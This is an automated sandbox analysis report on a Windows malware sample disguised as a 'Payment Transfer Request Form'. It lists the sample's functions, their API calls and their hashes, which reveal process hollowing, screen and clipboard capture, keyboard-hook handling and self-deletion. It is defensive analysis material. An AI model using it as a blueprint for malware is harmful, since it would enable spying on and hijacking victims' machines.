                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                              • String ID:
                                              • API String ID: 3906539128-0
                                              • Opcode ID: a2edd11b745fd0db19ae8b75a4dca2fd63e5a3b0d4ecfa6da1b026d4ab375051
                                              • Instruction ID: 77e6618fa9d19f9c50586940e2a7469f5a9d54f298177c93e0bbf68cc30459b4
                                              • Opcode Fuzzy Hash: a2edd11b745fd0db19ae8b75a4dca2fd63e5a3b0d4ecfa6da1b026d4ab375051
                                              • Instruction Fuzzy Hash: 1D31D67591122C9BCB21DF65D9897CDB7B8BF08310F5051EAE40CA72A1E7749F858F48
                                              Function 004315EC Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,00431274,00000034,?,?,00000000), ref: 004315FE
                                              • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00431307,00000000,?,00000000), ref: 00431614
                                              • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,00431307,00000000,?,00000000,0041C006), ref: 00431626
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Crypt$Context$AcquireRandomRelease
                                              • String ID:
                                              • API String ID: 1815803762-0
                                              • Opcode ID: 490f37dff30391dd88b2b348f1e17f82ee14bc365aa64bdd7ac48a14519942bc
                                              • Instruction ID: e2f248fbd61bea3c509e9dcbc4a9d000159a3c4e1760f154dd59208f6820a057
                                              • Opcode Fuzzy Hash: 490f37dff30391dd88b2b348f1e17f82ee14bc365aa64bdd7ac48a14519942bc
                                              • Instruction Fuzzy Hash: FDE0923130C310BBEB304F51AC09F172A55EB8DB72FA5063AF112E50F4D6518801855C
                                              Function 004407B5 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • GetCurrentProcess.KERNEL32(00000000,?,0044078B,00000000,0046B4F8,0000000C,004408E2,00000000,00000002,00000000), ref: 004407D6
                                              • TerminateProcess.KERNEL32(00000000,?,0044078B,00000000,0046B4F8,0000000C,004408E2,00000000,00000002,00000000), ref: 004407DD
                                              • ExitProcess.KERNEL32 ref: 004407EF
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Process$CurrentExitTerminate
                                              • String ID:
                                              • API String ID: 1703294689-0
                                              • Opcode ID: ab47e799b5bc4cc6dde358da0dc0a23fd4678ab9e3bf0635ceb4545ab71368f2
                                              • Instruction ID: 8c86c1f28e0fd2f6406888839527a8aea1509f7e03a0ffdd8510570f14deced8
                                              • Opcode Fuzzy Hash: ab47e799b5bc4cc6dde358da0dc0a23fd4678ab9e3bf0635ceb4545ab71368f2
                                              • Instruction Fuzzy Hash: 9AE04631000608ABEF017F20DD48A493B29EB40346F410029F9088B232CB3DED52CA89
                                              Function 0040A65A Relevance: 4.5, APIs: 3, Instructions: 19clipboardCOMMON
                                              Download Yara Rule
                                              APIs
                                              • OpenClipboard.USER32(00000000), ref: 0040A65D
                                              • GetClipboardData.USER32(0000000D), ref: 0040A669
                                              • CloseClipboard.USER32 ref: 0040A671
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Clipboard$CloseDataOpen
                                              • String ID:
                                              • API String ID: 2058664381-0
                                              • Opcode ID: edb8c36ac275bb67b795d66d8e1b797ea5e31e94c4ba3ac6c333071066a6c16d
                                              • Instruction ID: 184f8b84181a4a50bd43ef3289a1c1a9f5b779335cc527adffbe090e77bee848
                                              • Opcode Fuzzy Hash: edb8c36ac275bb67b795d66d8e1b797ea5e31e94c4ba3ac6c333071066a6c16d
                                              • Instruction Fuzzy Hash: 6CE08C3064432097D2206F60EC08B8A66649B50B12F064A7AB849AB2D1DA75DC208AAE
                                              Function 004329DA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 134COMMON
                                              Download Yara Rule
                                              APIs
                                              • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 004329F3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FeaturePresentProcessor
                                              • String ID:
                                              • API String ID: 2325560087-3916222277
                                              • Opcode ID: 6bf946e24e0cf3f7143bf6f7c2898541fb51292b7eeb3b4358a3a41aa26ebfb9
                                              • Instruction ID: 4a1c44cf8a386737ece403ae0cfd22a47b20ce31fd9c2d8f3958115f99bf9d9d
                                              • Opcode Fuzzy Hash: 6bf946e24e0cf3f7143bf6f7c2898541fb51292b7eeb3b4358a3a41aa26ebfb9
                                              • Instruction Fuzzy Hash: E4514A719002099BDB24CFAAD98579ABBF4FF48314F14846BD815EB350E3B9A910CFA5
                                              Function 0044BA59 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: .
                                              • API String ID: 0-248832578
                                              • Opcode ID: 0742d3138d3954d6b0adc7bce21f8647b4e5777487e1ab8e88fa8e0c5db588f4
                                              • Instruction ID: 24926096c943187a016d953fe808ce2acf1242cb654f72e39a34338bfc4b4f1c
                                              • Opcode Fuzzy Hash: 0742d3138d3954d6b0adc7bce21f8647b4e5777487e1ab8e88fa8e0c5db588f4
                                              • Instruction Fuzzy Hash: 0E3108719002486FEB248E79CC84EEB7BBDDB45304F14419EF858D7251EB34EE418B94
                                              Function 00445E1C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,004419DC,?,00000004), ref: 00445E6F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: InfoLocale
                                              • String ID: GetLocaleInfoEx
                                              • API String ID: 2299586839-2904428671
                                              • Opcode ID: f9893d92672fa9c5b6d787f9f7f2d4c4b9fbd30947df5498ead6f72c32f4f3f0
                                              • Instruction ID: a9bb3d2992a9d1fe8e60343c55b6d981a628f421e7cf107d295b861f9edee2c3
                                              • Opcode Fuzzy Hash: f9893d92672fa9c5b6d787f9f7f2d4c4b9fbd30947df5498ead6f72c32f4f3f0
                                              • Instruction Fuzzy Hash: 6DF0F631600708BBDF016F619C05F6E7B51EB14721F10401BFC051A253CA758D109A9D
                                              Function 004068CD Relevance: 3.1, APIs: 2, Instructions: 86fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 004068E8
                                              • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 004069B0
                                                • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FileFind$FirstNextsend
                                              • String ID:
                                              • API String ID: 4113138495-0
                                              • Opcode ID: 9ba1950aaa4909eb7c6bc4a7abdee236abe9e82e84a9556be4593e8ae34175c7
                                              • Instruction ID: f886cb8170a1cbefaa312452e39d18d6cd017e90ab843946bfd6f4b2f28fefe7
                                              • Opcode Fuzzy Hash: 9ba1950aaa4909eb7c6bc4a7abdee236abe9e82e84a9556be4593e8ae34175c7
                                              • Instruction Fuzzy Hash: 9C218F711043015BC314FBA1DC96CEFB7ACAF91358F400A3EF596621E1EF389A09CA5A
                                              Function 0044F4F3 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                                                • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                                • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                                                • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                                • Part of subcall function 00445725: _free.LIBCMT ref: 00445784
                                                • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 00445791
                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F547
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorLast$_free$InfoLocale_abort
                                              • String ID:
                                              • API String ID: 1663032902-0
                                              • Opcode ID: ad0e0b7788e936bcfdd9e0a2c8ea1aecabb77b710f5984c66624a7eb150c0fcd
                                              • Instruction ID: 815750de5804ab4a8f75770bcc990d44dba9c2967eca50803adc2dd3443e40da
                                              • Opcode Fuzzy Hash: ad0e0b7788e936bcfdd9e0a2c8ea1aecabb77b710f5984c66624a7eb150c0fcd
                                              • Instruction Fuzzy Hash: 6421B372901206BBEF249F26DC45A7A73A8EB04315F10017BFD01C6242EB78AD59CB59
                                              Function 0044F17B Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                                                • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                                • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                                                • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                              • EnumSystemLocalesW.KERNEL32(0044F2A3,00000001,00000000,?,00441F7E,?,0044F8D0,00000000,?,?,?), ref: 0044F1ED
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                              • String ID:
                                              • API String ID: 1084509184-0
                                              • Opcode ID: 1e67477eb4f1d9c825940ef83573ecb2aed64948dc5e5734fb002b4aa87f20f9
                                              • Instruction ID: fc4c71b657a69648ba6c32e8c27400de65702582941300ca2eca7bc8fd592fd6
                                              • Opcode Fuzzy Hash: 1e67477eb4f1d9c825940ef83573ecb2aed64948dc5e5734fb002b4aa87f20f9
                                              • Instruction Fuzzy Hash: D811293B6007019FEB189F39D89167BBB91FF80358B14443DE94647B40D776A946C744
                                              Function 0044F723 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                                                • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                                • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                                                • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                              • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0044F4C1,00000000,00000000,?), ref: 0044F74F
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorLast$InfoLocale_abort_free
                                              • String ID:
                                              • API String ID: 2692324296-0
                                              • Opcode ID: c5ca8868f81a5dafb3fdb259ff2b8ec3965b2bfb8aabdce9695f87c3ae70661f
                                              • Instruction ID: e4b95bc4a5e1061338a04706472302caa06a68982d3ebb8569a44a178f9f49d5
                                              • Opcode Fuzzy Hash: c5ca8868f81a5dafb3fdb259ff2b8ec3965b2bfb8aabdce9695f87c3ae70661f
                                              • Instruction Fuzzy Hash: 09F02D36600516BBFB245B65DC05BBB7768EF40764F05447AEC19A3240EA7CFD05C6D4
                                              Function 0044F216 Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                                                • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                                • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                                                • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                              • EnumSystemLocalesW.KERNEL32(0044F4F3,00000001,?,?,00441F7E,?,0044F894,00441F7E,?,?,?,?,?,00441F7E,?,?), ref: 0044F262
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                              • String ID:
                                              • API String ID: 1084509184-0
                                              • Opcode ID: d9e72da5ca64d0dbd4f9725887adba7bc59a573407832ad1990d17eaaac4c4d9
                                              • Instruction ID: 7c38563944de2097393583401858843e6c2e12a799e64e453201a09b71e8bce8
                                              • Opcode Fuzzy Hash: d9e72da5ca64d0dbd4f9725887adba7bc59a573407832ad1990d17eaaac4c4d9
                                              • Instruction Fuzzy Hash: 44F0223A2007045FEB145F399881A7B7B94FF8036CB15447EF9458B690DAB6AC068614
                                              Function 004195F8 Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetUserNameW.ADVAPI32(?,00000010), ref: 0041962D
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: NameUser
                                              • String ID:
                                              • API String ID: 2645101109-0
                                              • Opcode ID: 8951ed9e5e96f4eef37346a31dc1e1cfc055faec67558bb1b1f4eabc83ab8062
                                              • Instruction ID: 5ca8c18713c22ae7facf93a828c8627c995cdb1c7496207664ac88b3b4335c79
                                              • Opcode Fuzzy Hash: 8951ed9e5e96f4eef37346a31dc1e1cfc055faec67558bb1b1f4eabc83ab8062
                                              • Instruction Fuzzy Hash: 7C01FF7290011CABCB04EBD5DC45EDEB7BCEF44319F10016AB505B61A5EEB46A89CB98
                                              Function 00445914 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00442D9A: EnterCriticalSection.KERNEL32(?,?,004404DB,00000000,0046B4D8,0000000C,00440496,?,?,?,00443038,?,?,004457DA,00000001,00000364), ref: 00442DA9
                                              • EnumSystemLocalesW.KERNEL32(004458CE,00000001,0046B680,0000000C), ref: 0044594C
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CriticalEnterEnumLocalesSectionSystem
                                              • String ID:
                                              • API String ID: 1272433827-0
                                              • Opcode ID: 9f071f7aa8f2d5cfdb4dd86670e259d2fa7dae68b4529c3cbc217272811744e5
                                              • Instruction ID: 57fcd2d1ba6fdacad71b84952267562ddc6b8062f8818d57533dd41bf3368d71
                                              • Opcode Fuzzy Hash: 9f071f7aa8f2d5cfdb4dd86670e259d2fa7dae68b4529c3cbc217272811744e5
                                              • Instruction Fuzzy Hash: CFF03C72A10700EFEB00EF69D846B5D77F0EB08325F10402AF400DB2A2DAB989448B5E
                                              Function 0044F130 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                                                • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                                • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                                                • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                              • EnumSystemLocalesW.KERNEL32(0044F087,00000001,?,?,?,0044F8F2,00441F7E,?,?,?,?,?,00441F7E,?,?,?), ref: 0044F167
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                              • String ID:
                                              • API String ID: 1084509184-0
                                              • Opcode ID: 27fc750af04bae75093f47f6c8e3f33632e5f31a47d704513601fd173c54c35f
                                              • Instruction ID: 407cbbfb1d6a14fdc0c4ba4a8479f65f1c0a46e2fba7f2f7bc53bc9e3406d240
                                              • Opcode Fuzzy Hash: 27fc750af04bae75093f47f6c8e3f33632e5f31a47d704513601fd173c54c35f
                                              • Instruction Fuzzy Hash: 22F05C3930020597DB049F35D845A7ABFA0EFC1754F060069EA058B651C6359C46C754
                                              Function 0040E2BB Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00413F34,00471E78,00472910,00471E78,00000000,00471E78,00000000,00471E78,3.8.0 Pro), ref: 0040E2CF
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: InfoLocale
                                              • String ID:
                                              • API String ID: 2299586839-0
                                              • Opcode ID: 856777f14b9a4662401ba442cf494b6ebb80c668ca2d98772b8c18b49fbcc60a
                                              • Instruction ID: e43a985d938ffd5d313bbeec62feab64fa47c80c67ee5e1720aa7bcbe65aeca7
                                              • Opcode Fuzzy Hash: 856777f14b9a4662401ba442cf494b6ebb80c668ca2d98772b8c18b49fbcc60a
                                              • Instruction Fuzzy Hash: 65D05E30B4421C7BEA10D6859C0AEAA7B9CD701B62F0001A6BA08D72D0E9E1AE0487E6
                                              Function 004328FC Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                              Download Yara Rule
                                              APIs
                                              • SetUnhandledExceptionFilter.KERNEL32(Function_00032908,0043262F), ref: 00432901
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExceptionFilterUnhandled
                                              • String ID:
                                              • API String ID: 3192549508-0
                                              • Opcode ID: 937b0859e2ecbaa4ed0ef4ac8f36e04938c9481000da7c0a06be09f57d080333
                                              • Instruction ID: aee9a4537fe14d989eba5338f3e0e07ed20d0bd3150f914eab3e23255f36ef43
                                              • Opcode Fuzzy Hash: 937b0859e2ecbaa4ed0ef4ac8f36e04938c9481000da7c0a06be09f57d080333
                                              • Instruction Fuzzy Hash:
                                              Function 00416E7E Relevance: 47.6, APIs: 26, Strings: 1, Instructions: 307windowmemoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00416E98
                                              • CreateCompatibleDC.GDI32(00000000), ref: 00416EA5
                                                • Part of subcall function 004172DF: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 0041730F
                                              • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00416F1B
                                              • DeleteDC.GDI32(00000000), ref: 00416F32
                                              • DeleteDC.GDI32(00000000), ref: 00416F35
                                              • DeleteObject.GDI32(00000000), ref: 00416F38
                                              • SelectObject.GDI32(00000000,00000000), ref: 00416F59
                                              • DeleteDC.GDI32(00000000), ref: 00416F6A
                                              • DeleteDC.GDI32(00000000), ref: 00416F6D
                                              • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00416F91
                                              • GetIconInfo.USER32(?,?), ref: 00416FC5
                                              • DeleteObject.GDI32(?), ref: 00416FF4
                                              • DeleteObject.GDI32(?), ref: 00417001
                                              • DrawIcon.USER32(00000000,?,?,?), ref: 0041700E
                                              • GetObjectA.GDI32(00000000,00000018,?), ref: 00417026
                                              • LocalAlloc.KERNEL32(00000040,00000001), ref: 00417095
                                              • GlobalAlloc.KERNEL32(00000000,?), ref: 00417104
                                              • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00417128
                                              • DeleteDC.GDI32(?), ref: 0041713C
                                              • DeleteDC.GDI32(00000000), ref: 0041713F
                                              • DeleteObject.GDI32(00000000), ref: 00417142
                                              • GlobalFree.KERNEL32(?), ref: 0041714D
                                              • DeleteObject.GDI32(00000000), ref: 00417201
                                              • GlobalFree.KERNEL32(?), ref: 00417208
                                              • DeleteDC.GDI32(?), ref: 00417218
                                              • DeleteDC.GDI32(00000000), ref: 00417223
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                                              • String ID: DISPLAY
                                              • API String ID: 479521175-865373369
                                              • Opcode ID: 1a3d4f3de887f4170ad339b02c00c27acc1d1d199adb59c50c414d62b5943ebe
                                              • Instruction ID: 4ba325f74191387ade15767708145f982ef5b1c7ca4df498548f130554e7309d
                                              • Opcode Fuzzy Hash: 1a3d4f3de887f4170ad339b02c00c27acc1d1d199adb59c50c414d62b5943ebe
                                              • Instruction Fuzzy Hash: 6FB16A315083009FD720DF24DC44BABBBE9EF88755F41482EF98993291DB38E945CB5A
                                              Function 0041642D Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 289libraryloaderthreadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00416474
                                              • GetProcAddress.KERNEL32(00000000), ref: 00416477
                                              • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00416488
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041648B
                                              • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041649C
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041649F
                                              • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004164B0
                                              • GetProcAddress.KERNEL32(00000000), ref: 004164B3
                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00416555
                                              • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041656D
                                              • GetThreadContext.KERNEL32(?,00000000), ref: 00416583
                                              • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004165A9
                                              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041662B
                                              • TerminateProcess.KERNEL32(?,00000000), ref: 0041663F
                                              • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041667F
                                              • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00416749
                                              • SetThreadContext.KERNEL32(?,00000000), ref: 00416766
                                              • ResumeThread.KERNEL32(?), ref: 00416773
                                              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041678A
                                              • GetCurrentProcess.KERNEL32(?), ref: 00416795
                                              • TerminateProcess.KERNEL32(?,00000000), ref: 004167B0
                                              • GetLastError.KERNEL32 ref: 004167B8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                              • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                              • API String ID: 4188446516-3035715614
                                              • Opcode ID: 5b7e1e0f0ab70bb274c8e1cba5061de31cdd1b1bc4dd29beedf5b9f83fbb8038
                                              • Instruction ID: 94204e0ceb90eb3d518cc699b6b418d02f123724867831e7a48fec904b930286
                                              • Opcode Fuzzy Hash: 5b7e1e0f0ab70bb274c8e1cba5061de31cdd1b1bc4dd29beedf5b9f83fbb8038
                                              • Instruction Fuzzy Hash: 9CA18E71604300AFDB109F64DC85F6B7BE8FB48749F00092AF695D62A1E7B8EC44CB5A
                                              Function 0040BFDE Relevance: 42.3, APIs: 6, Strings: 18, Instructions: 281registryCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 004112B5: TerminateProcess.KERNEL32(00000000,?,0040C3C8), ref: 004112C5
                                                • Part of subcall function 004112B5: WaitForSingleObject.KERNEL32(000000FF,?,0040C3C8), ref: 004112D8
                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C0D6
                                              • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C0E9
                                              • SetFileAttributesW.KERNEL32(?,00000080), ref: 0040C102
                                              • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040C132
                                                • Part of subcall function 0040A7F2: TerminateThread.KERNEL32(00409305,00000000,004721E8,0040BC76,?,00472200,pth_unenc,004721E8), ref: 0040A801
                                                • Part of subcall function 0040A7F2: UnhookWindowsHookEx.USER32(?), ref: 0040A811
                                                • Part of subcall function 0040A7F2: TerminateThread.KERNEL32(004092EF,00000000,?,00472200,pth_unenc,004721E8), ref: 0040A823
                                                • Part of subcall function 0041A17B: CreateFileW.KERNELBASE(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041A29A,00000000,00000000,00000000), ref: 0041A1BA
                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040C37D
                                              • ExitProcess.KERNEL32 ref: 0040C389
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
